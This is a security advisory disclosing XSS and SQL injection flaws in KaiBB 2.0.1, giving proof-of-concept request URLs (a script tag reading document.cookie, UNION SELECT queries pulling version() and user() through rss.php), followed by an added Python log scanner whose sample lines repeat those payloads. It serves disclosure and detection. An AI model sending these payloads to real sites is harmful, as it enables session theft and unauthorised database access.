Advisory:              KaiBB 2.0.1 XSS and SQL Injection vulnerabilities
Advisory ID:           SSCHADV2011-027
Author:                Stefan Schurtz
Affected Software:     Successfully tested on KaiBB 2.0.1
Vendor URL:            http://code.google.com/p/kaibb/
Vendor Status:         informed
CVE-ID:                -

==========================
Vulnerability Description:
==========================

KaiBB 2.0.1 is prone to XSS and SQL Injection vulnerabilities

==================
Technical Details:
==================

Cross-site Scripting

http://<target>/kaibb/?'</script><script>alert(document.cookie)</script>
http://<target>/kaibb/index.php?'</script><script>alert(document.cookie)</script>

SQL Injection

http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, version(), NULL, NULL, NULL, NULL, NULL AND 'a'='a
http://<target>/kaibb/rss.php?forum=' UNION ALL SELECT NULL, user(), NULL, NULL, NULL, NULL, NULL AND 'a'='a

=========
Solution:
=========

-

====================
Disclosure Timeline:
====================

08-Oct-2011 - informed developers
08-Oct-2011 - release date of this security advisory

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://code.google.com/p/kaibb/
http://code.google.com/p/kaibb/issues/detail?id=2
http://www.rul3z.de/advisories/SSCHADV2011-027.txt
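
A log check for the two request patterns listed under Technical Details, as an added example that is not part of the original advisory or of KaiBB: it scans web-server access logs for non-numeric forum values on rss.php and for script tags in the query string. The log lines are constructed samples, and the rule that a legitimate forum id is a plain integer is an assumption, not something the advisory states.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed access-log lines (documentation IP range), not real traffic.
SAMPLE_LOG = """\
198.51.100.7 - - [08/Oct/2011:10:00:01 +0200] "GET /kaibb/rss.php?forum=3 HTTP/1.1" 200 5120
198.51.100.9 - - [08/Oct/2011:10:00:05 +0200] "GET /kaibb/rss.php?forum=%27%20UNION%20ALL%20SELECT%20NULL,%20version(),%20NULL,%20NULL,%20NULL,%20NULL,%20NULL%20AND%20%27a%27=%27a HTTP/1.1" 200 811
198.51.100.9 - - [08/Oct/2011:10:00:09 +0200] "GET /kaibb/index.php?%27%3C/script%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 9034
198.51.100.12 - - [08/Oct/2011:10:01:30 +0200] "GET /kaibb/index.php HTTP/1.1" 200 9001
"""

# Client address and request target; ".+?" tolerates raw spaces in the URL.
LINE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
SCRIPT_TAG = re.compile(r"<\s*/?\s*script\b", re.IGNORECASE)
NUMERIC_ID = re.compile(r"[0-9]+")


def classify(target):
    """Return the findings for one request target (path plus query)."""
    parts = urlsplit(target)
    findings = []
    if parts.path.lower().endswith("/rss.php"):
        # Assumption: a legitimate forum id is a plain integer.
        values = parse_qs(parts.query, keep_blank_values=True).get("forum", [])
        if any(not NUMERIC_ID.fullmatch(v) for v in values):
            findings.append("sqli:rss.php:forum")
    # The advisory lists /kaibb/ and index.php; the check is path-independent.
    if SCRIPT_TAG.search(unquote_plus(parts.query)):
        findings.append("xss:query-string")
    return findings


def scan(log_text):
    """Return (client, findings) for every log line with at least one finding."""
    hits = []
    for line in log_text.splitlines():
        match = LINE.match(line)
        if not match:
            continue  # not a request line in the expected format
        findings = classify(match.group(2))
        if findings:
            hits.append((match.group(1), findings))
    return hits


if __name__ == "__main__":
    for client, findings in scan(SAMPLE_LOG):
        print(client, ",".join(findings))
```
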